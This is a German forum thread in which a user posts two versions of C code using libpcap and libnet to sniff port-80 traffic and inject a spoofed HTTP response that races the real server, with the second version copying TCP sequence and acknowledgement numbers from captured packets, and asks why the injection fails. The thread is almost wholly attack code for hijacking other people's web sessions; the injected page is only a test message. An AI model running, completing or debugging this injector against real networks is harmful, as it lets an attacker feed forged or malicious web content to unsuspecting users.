pakete injecten per libnet...

Flas

Well-Known Member
hi, ich hab mal wieder ein problem, ich habe ein kleines proggie geschrieben das nach tcp packeten snifft, die zielport 80 haben, fängt der data teil dieser pakete mit einem "GET" oder "POST" an, so versucht es der serverantwort zuvor zu kommen und schickt eine testantwort.
nun, alles schön und gut, geht auch wunderbar, gibt keine fehler etc. aber es scheint trotzdem nichts zu senden auch wenn es regelmässig:

"[+] construction and injection completed, wrote all %d bytes"

sagt, naja, ich kann zumindest kein paket ersniffen. WEnn es jetzt nur beim browser nicht angenommen würde, dann würde ich sagen ich müsste die ack-nummer noch der session anpassen, aber so - kein ahnung :(

das ganze ist schon ne ganze weile in arbeit, so wollte ich das endlich mal hinbekommen, ist nichts weltbewegend wichtiges, aber es solte doch möglich sein!? wäre für tipps und hilfe sehr dankbar.

(libpcap und libnet sind erforderlich zum compilen)

hier alles in farbe -> http://phpfi.com/63494

Code:
//  gcc -lpcap -Wall `libnet-config --defines` sniff.c `libnet-config --libs` -I/usr/local/include -L/usr/local/lib

#include <stdio.h>
#include <sys/types.h>  
#include <sys/socket.h>     
#include <netdb.h>
#include <netinet/in.h>     
#include <netinet/tcp.h>
#include <arpa/inet.h>      
#include <stdlib.h>
#include <netinet/in_systm.h>

#define __GLIBC__ 1

#include <pcap.h>           
#include <libnet.h>  
#include <netinet/ip.h>
#include <netinet/if_ether.h>

void my_callback(u_char*,const struct pcap_pkthdr*,const u_char*);
int send_raw(char*, char*, int*, int*, char *data, int);
int wildcmp(char *, char *);

int main() {
    pcap_t *descr;                        /* Session handle */
    char dev[] = "rl0";                                /* The device to sniff on */
    char f[] = "tcp dst port 80";
    char errbuf[PCAP_ERRBUF_SIZE]; /* Error string */
    struct bpf_program fp;      /* hold compiled program     */
    bpf_u_int32 maskp;          /* subnet mask               */
    bpf_u_int32 netp;           /* ip                        */

    pcap_lookupnet(dev,&netp,&maskp,errbuf);
    
    if((descr = pcap_open_live(dev, BUFSIZ, 1, 1, errbuf)) == NULL) {
        perror("[-] pcap_open_live() failed");
        return 1;
    }

    if(pcap_compile(descr,&fp,f,0,netp) == -1) {
        perror("[-] pcap_compile() failed");
        return 2;
    }
    
    if(pcap_setfilter(descr,&fp) == -1) {
        perror("[-] pcap_setfilter() failed");
        return 3;
    }
    
    printf("[!] starting sniffing...\n\n");

    pcap_loop(descr,0,my_callback,NULL);
    
    printf("[!] finished sniffing\n");
    
    pcap_close(descr);
    return 0;
}

void my_callback(u_char *useless,const struct pcap_pkthdr *header,const u_char *packet) {
    static int count = 1;
    struct ip* ip_hdr;          
    struct tcphdr* tcp_hdr;        
    char src_ip[100], dst_ip[100];
    int src_port, dst_port;

    ip_hdr = (struct ip*) (packet + sizeof(struct ether_header));  

    inet_ntop(AF_INET, &ip_hdr->ip_src, src_ip, sizeof(src_ip));
    inet_ntop(AF_INET, &ip_hdr->ip_dst, dst_ip, sizeof(dst_ip));

    tcp_hdr = (struct tcphdr*)(packet + sizeof(struct ip) + sizeof(struct ether_header));
    src_port = ntohs(tcp_hdr->th_sport);  
    dst_port = ntohs(tcp_hdr->th_dport);

    printf("src %s:%d -> dst %s:%d\n",src_ip, src_port, dst_ip, dst_port);


    if(tcp_hdr->th_flags & TH_PUSH) {
        char *data = (char*) (packet + sizeof(struct tcphdr) + sizeof(struct ip) + sizeof(struct ether_header) );
        if(wildcmp(data,"GET*") || wildcmp(data,"POST*")) {
            printf("\n[!] found a suitable connection\n");
            char payload[] = "HTTP/1.1 200 OK\nConnection: close\nContent-Type: text/html\n\n<html><head><title>TEST</title></head><body><h1>THIS IS JUST A TEST\nGUYS!!</h1>";
            if(send_raw( dst_ip, src_ip, &dst_port, &src_port,payload,sizeof payload)) 
                exit(4);
        }
             
    }
    
    count++;
}

int send_raw(char *srcip, char *dstip, int *src_port, int *dst_port, char *data, int datalen) {
    int network, packet_size, c;
    u_long src_ip, dst_ip;
    u_short src_prt, dst_prt;
    u_char *packet;

    src_ip  = 0;
    dst_ip  = 0;
    src_prt = 0;
    dst_prt = 0;

    dst_prt = *dst_port;
    if (!(dst_ip = libnet_name_resolve(dstip, LIBNET_RESOLVE))) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] bad destination IP address: %s\n", optarg);
    }

    src_prt = *src_port;
    if (!(src_ip = libnet_name_resolve(srcip, LIBNET_RESOLVE))) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] bad source IP address: %s\n", optarg);
    }

    if (!src_ip || !src_prt || !dst_ip || !dst_prt) {
        printf("\n[-] problems with greping addr's\n");
        exit(1);
    }

    packet_size = LIBNET_IP_H + LIBNET_TCP_H + datalen;

    
    
    libnet_init_packet(packet_size, &packet);
    if (packet == NULL) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_init_packet failed\n");
    }

    network = libnet_open_raw_sock(IPPROTO_RAW);
    if (network == -1) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] can't open network.\n");
    }

    if (libnet_build_ip(LIBNET_TCP_H,   /* size of the packet sans IP header */
        IPTOS_LOWDELAY,                 /* IP tos */
        242,                            /* IP ID */
        0,                              /* frag stuff */
        48,                             /* TTL */
        IPPROTO_TCP,                    /* transport protocol */
        src_ip,                         /* source IP */
        dst_ip,                         /* destination IP */
        NULL,                           /* payload (none) */
        0,                              /* payload length */
        packet) == -1) {                /* packet header memory */
            libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_build_ip failed\n");
    }

    if (libnet_build_tcp(src_prt,       /* source TCP port */
        dst_prt,                        /* destination TCP port */
        0xa1d95,                        /* sequence number */
        0x53,                           /* acknowledgement number */
        TH_ACK,                         /* control flags */
        1024,                           /* window size */
        0,                              /* urgent pointer */
        data,                           /* payload (none) */
        datalen,                        /* payload length */
        packet + LIBNET_IP_H) == -1) {  /* packet header memory */
            libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_build_tcp failed\n");
    }

    if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_do_checksum failed\n");
    }

//    strncpy(packet + LIBNET_IP_H + LIBNET_TCP_H, data, sizeof(packet) - LIBNET_IP_H + LIBNET_TCP_H);

    c = libnet_write_ip(network, packet, packet_size);

    if (c < packet_size) {
        libnet_error(LN_ERR_WARNING, "\n[-] libnet_write_ip only wrote %d bytes\n", c);
    }
    else {
        printf("\n[+] construction and injection completed, wrote all %d bytes\n\n", c);
    }

    //cleaning

    if (libnet_close_raw_sock(network) == -1) {
        libnet_error(LN_ERR_WARNING, "[-] libnet_close_raw_sock couldn't close the interface");
    }

    libnet_destroy_packet(&packet);

    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}

int wildcmp(char *string1, char *string2){
    char *tmp=string1,*tmp2=string2;
    int backup=0;
    while(1){
        while(*string1 == *string2 && *string1 != '\0'
             && string2 != '\0'){
            string1++;
            string2++;
        }
        if(*string1 == '\0' && *string2 == '\0')
            return 1;
        if(*string2 == '\0')
            return 0;
        if(*string2 != '*' && backup != 1)
            return 0;
        if(*string2 == '*'){
            string2++;
            if(*string2 == '\0')
                return 1;
        } else{
            string1=tmp;
            string2=tmp2;
        }
        while(*string1 != *string2 && *string1 != '\0')
            string1++;
        if(*string1 == '\0')
                return 0;
        tmp=string1+1;
        tmp2=string2;
        backup=1;
    }
    return 0;
}

mfg, Flas!!
 
Zuletzt bearbeitet:
sooo, hab nun mal die ack und seq nummern auch entsprechend angepasst (vielen dank an akerit), das ganze sieht nun so aus, aber injectet immer noch nicht, trotz keinerlei fehler:

--> http://phpfi.com/63620

Code:
//  gcc -lpcap -Wall `libnet-config --defines` sniff.c `libnet-config --libs` -I/usr/local/include -L/usr/local/lib

#include <stdio.h>
#include <sys/types.h>  
#include <sys/socket.h>     
#include <netdb.h>
#include <netinet/in.h>     
#include <netinet/tcp.h>
#include <arpa/inet.h>      
#include <stdlib.h>
#include <netinet/in_systm.h>

#define __GLIBC__ 1

#include <pcap.h>           
#include <libnet.h>  
#include <netinet/ip.h>
#include <netinet/if_ether.h>

void my_callback(u_char*,const struct pcap_pkthdr*,const u_char*);
int send_raw(char*, char*, int*, int*, char *data, int, u_long, u_long);
int wildcmp(char *, char *);

int main() {
    pcap_t *descr;                        /* Session handle */
    char dev[] = "rl0";                                /* The device to sniff on */
    char f[] = "tcp dst port 80";
    char errbuf[PCAP_ERRBUF_SIZE]; /* Error string */
    struct bpf_program fp;      /* hold compiled program     */
    bpf_u_int32 maskp;          /* subnet mask               */
    bpf_u_int32 netp;           /* ip                        */

    pcap_lookupnet(dev,&netp,&maskp,errbuf);
    
    if((descr = pcap_open_live(dev, BUFSIZ, 1, 1, errbuf)) == NULL) {
        perror("[-] pcap_open_live() failed");
        return 1;
    }

    if(pcap_compile(descr,&fp,f,0,netp) == -1) {
        perror("[-] pcap_compile() failed");
        return 2;
    }
    
    if(pcap_setfilter(descr,&fp) == -1) {
        perror("[-] pcap_setfilter() failed");
        return 3;
    }
    
    printf("[!] starting sniffing...\n\n");

    pcap_loop(descr,0,my_callback,NULL);
    
    printf("[!] finished sniffing\n");
    
    pcap_close(descr);
    return 0;
}

void my_callback(u_char *useless,const struct pcap_pkthdr *header,const u_char *packet) {
    static int count = 1;
    struct ip* ip_hdr;          
    struct tcphdr* tcp_hdr;        
    char src_ip[100], dst_ip[100];
    int src_port, dst_port;

    ip_hdr = (struct ip*) (packet + sizeof(struct ether_header));  

    inet_ntop(AF_INET, &ip_hdr->ip_src, src_ip, sizeof(src_ip));
    inet_ntop(AF_INET, &ip_hdr->ip_dst, dst_ip, sizeof(dst_ip));

    tcp_hdr = (struct tcphdr*)(packet + sizeof(struct ip) + sizeof(struct ether_header));
    src_port = ntohs(tcp_hdr->th_sport);  
    dst_port = ntohs(tcp_hdr->th_dport);

    printf("src %s:%d -> dst %s:%d\n",src_ip, src_port, dst_ip, dst_port);


    if(tcp_hdr->th_flags & TH_ACK) {
        char *data = (char*) (packet + sizeof(struct tcphdr) + sizeof(struct ip) + sizeof(struct ether_header) );
        if(wildcmp(data,"GET*") || wildcmp(data,"POST*")) {
            printf("\n[!] found a suitable connection\n");
            char payload[] = "HTTP/1.1 200 OK\nConnection: close\nContent-Type: text/html\n\n<html><head><title>TEST</title></head><body><h1>THIS IS JUST A TEST\nGUYS!!</h1>\r\n";
            if(send_raw( dst_ip, src_ip, &dst_port, &src_port,payload,sizeof payload,ntohl(tcp_hdr->th_ack),ntohl(tcp_hdr->th_seq)+sizeof(packet))) 
                exit(4);
        }
             
    }
    
    count++;
}

int send_raw(char *srcip, char *dstip, int *src_port, int *dst_port, char *data, int datalen, u_long seq, u_long ack) {
    int network, packet_size, c;
    u_long src_ip, dst_ip;
    u_short src_prt, dst_prt;
    u_char *packet;

    src_ip  = 0;
    dst_ip  = 0;
    src_prt = 0;
    dst_prt = 0;

    printf("seq:%lu,ack:%lu\n",seq,ack);         //for debugging
    
    dst_prt = *dst_port;
    if (!(dst_ip = libnet_name_resolve(dstip, LIBNET_RESOLVE))) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] bad destination IP address: %s\n", optarg);
    }

    src_prt = *src_port;
    if (!(src_ip = libnet_name_resolve(srcip, LIBNET_RESOLVE))) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] bad source IP address: %s\n", optarg);
    }

    if (!src_ip || !src_prt || !dst_ip || !dst_prt) {
        printf("\n[-] problems with greping addr's\n");
        exit(1);
    }

    packet_size = LIBNET_IP_H + LIBNET_TCP_H + datalen;
    
    libnet_init_packet(packet_size, &packet);
    if (packet == NULL) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_init_packet failed\n");
    }

    network = libnet_open_raw_sock(IPPROTO_RAW);
    if (network == -1) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] can't open network.\n");
    }

    if (libnet_build_ip(LIBNET_TCP_H,   /* size of the packet sans IP header */
        IPTOS_LOWDELAY,                 /* IP tos */
        242,                            /* IP ID */
        0,                              /* frag stuff */
        48,                             /* TTL */
        IPPROTO_TCP,                    /* transport protocol */
        src_ip,                         /* source IP */
        dst_ip,                         /* destination IP */
        NULL,                           /* payload (none) */
        0,                              /* payload length */
        packet) == -1) {                /* packet header memory */
            libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_build_ip failed\n");
    }

    if (libnet_build_tcp(src_prt,       /* source TCP port */
        dst_prt,                        /* destination TCP port */
        seq,                            /* sequence number */
        ack,                            /* acknowledgement number */
        TH_ACK,                         /* control flags */
        1024,                           /* window size */
        0,                              /* urgent pointer */
        data,                           /* payload (none) */
        datalen,                        /* payload length */
        packet + LIBNET_IP_H) == -1) {  /* packet header memory */
            libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_build_tcp failed\n");
    }

    if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) {
        libnet_error(LIBNET_ERR_FATAL, "\n[-] libnet_do_checksum failed\n");
    }

//    strncpy(packet + LIBNET_IP_H + LIBNET_TCP_H, data, sizeof(packet) - LIBNET_IP_H + LIBNET_TCP_H);

    c = libnet_write_ip(network, packet, packet_size);

    if (c < packet_size) {
        libnet_error(LN_ERR_WARNING, "\n[-] libnet_write_ip only wrote %d bytes\n", c);
    }
    else {
        printf("\n[+] construction and injection completed, wrote all %d bytes\n\n", c);
    }

    //cleaning

    if (libnet_close_raw_sock(network) == -1) {
        libnet_error(LN_ERR_WARNING, "[-] libnet_close_raw_sock couldn't close the interface");
    }

    libnet_destroy_packet(&packet);

    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}

int wildcmp(char *string1, char *string2){
    char *tmp=string1,*tmp2=string2;
    int backup=0;
    while(1){
        while(*string1 == *string2 && *string1 != '\0'
             && string2 != '\0'){
            string1++;
            string2++;
        }
        if(*string1 == '\0' && *string2 == '\0')
            return 1;
        if(*string2 == '\0')
            return 0;
        if(*string2 != '*' && backup != 1)
            return 0;
        if(*string2 == '*'){
            string2++;
            if(*string2 == '\0')
                return 1;
        } else{
            string1=tmp;
            string2=tmp2;
        }
        while(*string1 != *string2 && *string1 != '\0')
            string1++;
        if(*string1 == '\0')
                return 0;
        tmp=string1+1;
        tmp2=string2;
        backup=1;
    }
    return 0;
}
 
Zurück
Oben